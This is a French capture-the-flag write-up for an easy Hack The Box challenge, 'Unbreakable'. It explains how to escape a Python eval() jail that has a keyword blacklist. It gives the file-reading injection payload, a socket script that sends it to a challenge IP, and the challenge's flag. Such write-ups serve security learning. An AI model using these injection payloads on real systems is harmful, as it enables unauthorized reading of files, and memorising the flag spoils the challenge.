Unbreakable

Catégorie: Misc Difficulté: easy Flag: HTB{3v4l_0r_3vuln??}

Challenge

Description

Think you can escape my grasp? Challenge accepted! I dare you to try and break free, but beware, it won't be easy. I'm ready for whatever tricks you have up your sleeve!

Ce challenge tourne sur un docker, disponible sur

Analyse

L’input que l’on envoie termine dans un eval à la ligne 84 : eval(ans + '()')

Mais nous n’avons pas le droit d’utiliser n’importe lequel des mots contenu dans la blacklist.

Comme le eval termine forcément par () , il faut penser que notre input doit se terminer par des parenthèse mais sans les mettre.

Le payload est donc le suivant : **print(open('flag.txt').read())or**

Le or permet de tester si le terme de gauche est None, alors le terme de droite est renvoyé. Le terme de droite sera alors un tuple vide () et ne provoquera aucune erreur tout en interprétant la fonction print.

Script de résolution

import socket

def solve(host: str, port: int):
	client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	client.connect((host, port))
	client.recv(4096)
	ans = b"print(open('flag.txt').read())or"
	client.send(ans + b"\n")
	flag = client.recv(4096).split(b'\n')[0].decode()
	print(f"Flag: {flag}")

if __name__ == '__main__':
	solve('94.237.63.235', 59961)

PrécédentStop Drop and Roll SuivantWere Pickle Phreaks

Dernière mise à jour il y a 1 an

Cet article vous a-t-il été utile ?